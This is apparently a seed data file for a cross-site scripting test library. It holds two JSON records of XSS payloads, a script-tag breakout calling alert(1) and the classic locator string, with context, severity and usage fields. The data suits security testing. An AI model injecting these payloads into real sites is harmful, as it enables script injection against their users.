[
  {
    "id": "xss-001",
    "payload": "\"><script>alert(1)</script>",
    "context": "reflected",
    "vector": "html",
    "tags": ["basic","script"],
    "notes": "Payload cl√°ssico para inserir script em HTML.",
    "severity": "low",
    "encodings": ["none"],
    "example_usage": "<div>{{INPUT}}</div>",
    "source": "seed",
    "created_at": "2024-01-01T00:00:00Z",
    "version": "1.0.0",
    "score": 15
  },
  {
    "id": "xss-002",
    "payload": "';!--\"<XSS>=&{()}",
    "context": "reflected",
    "vector": "attribute",
    "tags": ["attribute","encoded"],
    "notes": "Payload de teste para atributos e escapes incomuns.",
    "severity": "medium",
    "encodings": ["html_entities"],
    "example_usage": "<img src='x' onerror=\"alert(1)\">",
    "source": "legacy",
    "created_at": "2024-01-02T00:00:00Z",
    "version": "1.0.0",
    "score": 40
  }
]
